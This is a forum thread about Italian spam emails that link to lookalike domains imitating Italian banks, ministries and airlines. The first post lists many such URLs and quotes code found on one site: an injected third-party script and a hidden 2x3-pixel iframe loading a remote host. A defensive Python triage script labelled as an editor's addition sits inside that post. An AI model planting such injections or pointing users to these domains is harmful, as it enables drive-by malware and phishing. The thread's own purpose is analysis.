Author Topic: Italian spam with suspicious link to malware  (Read 7223 times)


June 14, 2012, 03:15:27 am

Edgar Bangkok

The last week I received several emails with the following text

Code:
Vbcinterfree Fatto pee compiacere hn
http://mininterrno.info

Code:
Bayoutoyouemail Che cotanto riescono incomldi alla società;
http://palazzochigii.com

Code:
Maddawgemail Servire Di Specchio A Qualche Femmina
Http://victorysolution.org


It is spam hitting Italian users with different links in the mail.
All the links are similar to legitimate IT sites.

This is a list of active fake links in emails

Code:
    http://parlamentosenato.info
    http://allitallia.com/agenzia/roma/index.php
    http://mininterrno.info
    http://clubbviaggi.net/agenzia/roma/index07.php
    http://clubbviaggi.com/agenzia/roma/index1.php
    http://mininterrno.com
    http://easyinncontri.com/ultimaora/index.php
    http://easyinncontri.net/agenzia/roma/index07.php
    http://constriv.net/agenzia/roma/index.php
    http://esterii.com
    http://bancaditallia.com/agenzia/roma/index1.php
    http://bancaditallia.com/ultimaora/index11.php
    http://palazzochigii.com
    http://intessasanpaol.com/agenzia/roma/index11.php
    http://ultimaoranews.com/agenzia/roma/index11.php
    http://myedreams.net/agenzia/roma/index07.php
    http://ultimaoranews.com/ultimaora/index07.php
    http://intessasanpaol.com/ultimaora/index07.php
    http://bancosposta.it/ultimaora/index.php
    http://intessasanpaol.com/ultimaora/index2.php
    http://bancosposta.it/agenzia/roma/index1.php
    http://chattta.net/ultimaora/index.php
    http://3bbmeteo.com/ultimaora/index.php
    http://movimenti.info/ultimaora/index11.php
    http://bancodiposta.com/agenzia/roma/index.php
    http://zygnaa.com/agenzia/roma/index.php
    http://ultimaoranews.com/ultimaora/index1.php
    http://biigpoint.net/agenzia/roma/index07.php
    http://hoooligano.com/agenzia/roma/index11.php
    http://movimenti.info/agenzia/roma/index07.php
    http://intessasanpaol.com/ultimaora/index.php
    http://ultimaoranews.net/ultimaora/index2.php
    http://myedreams.com/agenzia/roma/index07.php
    http://ultimaoranews.com/agenzia/roma/index11.php
    http://intessasanpaol.com/ultimaora/index07.php
    http://bancosposta.it/ultimaora/index2.php
    http://bancodinapolli.com/ultimaora/index11.php
    http://easyinncontri.com/ultimaora/index.php
    http://allitallia.com/agenzia/roma/index07.php

All links are similar to legitimate links, but with a few letters changed in the link text.

The structure of the spam mail seems to indicate links to malware.

Examining one of the many links:

Code:
http://mininterrno.info

with:

Code:
<script type="text/javascript" src="http://www.cool79.com.tw/images/process.js"></script>

and:

Code:
document.write('<iframe src="http://clixchoi.com/t/8f14eea930749a9e2bbdcc785db4eb2a" width="2" height="3" frameborder="0"></iframe> ')

The suspicious site:

Code:
"http://clixchoi.com/t/8f14eea930749a9e2bbdcc785db4eb2a"

with IP and whois:

Code:
IP Information for 178.162.241.196
IP Location: Belize Belize Belmopan Leaseweb Germany Gmbh
ASN: AS28753
Resolve Host: hosted-by.leaseweb.com
IP Address: 178.162.241.196 [Whois] [Reverse-Ip] [Ping] [DNS Lookup] [Traceroute]
NetRange:       178.0.0.0 - 178.255.255.255
CIDR:           178.0.0.0/8

Site analysis of

Code:
http://clixchoi.com/t/8f14eea930749a9e2bbdcc785db4eb2a

with Wepawet, Anubis, etc. doesn't show any type of malware, even if the structure of the spam suggests it is distributing malware.

Any suggestions???

Regards

Edgar from Bangkok  ;)
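Two checks a defender would want to automate for a thread like this, as an added example by the editor (not code from the poster or from any tool named in the thread): scoring each spam domain's second-level label against a list of imitated brand labels by edit distance, and scanning a fetched page for third-party script includes and tiny or CSS-hidden iframes of the kind the post found on mininterrno.info. The BRAND_LABELS list and SAMPLE_PAGE body are constructed for illustration; the spam URLs, the script URL and the iframe URL are the ones quoted in the post.

```python
"""Triage helpers for lookalike-domain spam (editor's added example, not from the thread)."""
import re
from urllib.parse import urlparse

# Constructed list of brand labels the spam domains appear to imitate.
# Assumption: picked by the editor for illustration, not stated in the post.
BRAND_LABELS = [
    "bancaditalia", "intesasanpaolo", "bancoposta", "palazzochigi",
    "alitalia", "3bmeteo", "bancodinapoli", "esteri",
]

# Sample input: a few of the spam URLs listed in the post.
SPAM_URLS = [
    "http://bancaditallia.com/agenzia/roma/index1.php",
    "http://intessasanpaol.com/ultimaora/index07.php",
    "http://bancosposta.it/ultimaora/index.php",
    "http://easyinncontri.com/ultimaora/index.php",
    "http://3bbmeteo.com/ultimaora/index.php",
]

# Constructed page body mirroring the injected <script> and the document.write()'d
# iframe quoted in the post; the two URLs inside it come from the post.
SAMPLE_PAGE = (
    '<html><body><p>Ultima ora</p>'
    '<script type="text/javascript" src="http://www.cool79.com.tw/images/process.js"></script>'
    '<script>document.write(\'<iframe src="http://clixchoi.com/t/8f14eea930749a9e2bbdcc785db4eb2a"'
    ' width="2" height="3" frameborder="0"></iframe> \')</script>'
    '</body></html>'
)


def levenshtein(a, b):
    """Edit distance (insert/delete/substitute) with a rolling single row."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_label(url):
    """Second-level label of the host, e.g. 'bancaditallia' for bancaditallia.com."""
    host = (urlparse(url).hostname or "").lower()
    parts = host.split(".")
    return parts[-2] if len(parts) >= 2 else host


def closest_brand(label, max_distance=2):
    """(brand, distance) for the nearest brand label within max_distance, else None.
    Distance 0 is the real brand, not a lookalike, so it is not reported."""
    best = None
    for brand in BRAND_LABELS:
        d = levenshtein(label, brand)
        if 0 < d <= max_distance and (best is None or d < best[1]):
            best = (brand, d)
    return best


IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
SCRIPT_SRC_RE = re.compile(r'<script\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.I)
ATTR_RE = re.compile(r'(\w+)\s*=\s*["\']([^"\']*)["\']')


def _pixels(value):
    """Integer pixel size from a width/height attribute; None for '100%' or missing."""
    return int(value) if value is not None and value.isdigit() else None


def find_hidden_iframes(html, page_host, max_px=10):
    """Flag iframes that are tiny or CSS-hidden; injected loaders hide this way."""
    hits = []
    for m in IFRAME_RE.finditer(html):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(m.group(1))}
        w, h = _pixels(attrs.get("width")), _pixels(attrs.get("height"))
        style = attrs.get("style", "").replace(" ", "").lower()
        tiny = w is not None and h is not None and w <= max_px and h <= max_px
        css_hidden = "display:none" in style or "visibility:hidden" in style
        if tiny or css_hidden:
            src = attrs.get("src", "")
            hits.append({
                "src": src,
                "cross_domain": (urlparse(src).hostname or page_host) != page_host,
                "reason": "tiny" if tiny else "css-hidden",
            })
    return hits


def external_scripts(html, page_host):
    """Hosts of <script src=...> includes that are not the page's own host."""
    hosts = []
    for src in SCRIPT_SRC_RE.findall(html):
        host = urlparse(src).hostname
        if host and host != page_host:
            hosts.append(host)
    return hosts


if __name__ == "__main__":
    for url in SPAM_URLS:
        print(url, "->", closest_brand(registrable_label(url)))
    print(external_scripts(SAMPLE_PAGE, "mininterrno.info"))
    print(find_hidden_iframes(SAMPLE_PAGE, "mininterrno.info"))
```

The edit-distance threshold of 2 catches the doubled-letter and dropped-letter variants in the list (bancaditallia, intessasanpaol, bancosposta, 3bbmeteo) without matching unrelated names such as easyinncontri; the iframe check keys on the 2x3 pixel frame and the cross-domain source, which are the two signals in the post worth alerting on even when the sandboxes return nothing.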

June 14, 2012, 10:03:10 am
Reply #1

dlipman

It could be the site needs a referral from a site in the chain and you only have one chance per IP.

June 14, 2012, 11:26:25 am
Reply #2

Edgar Bangkok

I tried with different referrers, with different user agents, with different IPs (not Thai), but for the moment I do not detect any malware ....
...........maybe it needs a mix of these sets ..........


Edgar

June 14, 2012, 11:31:27 am
Reply #3

dlipman

Yeah, I tried using Malzilla with a Tor proxy with referrals as well as running 4 or 5 URLs in a SandBox.  I got nothing   :'(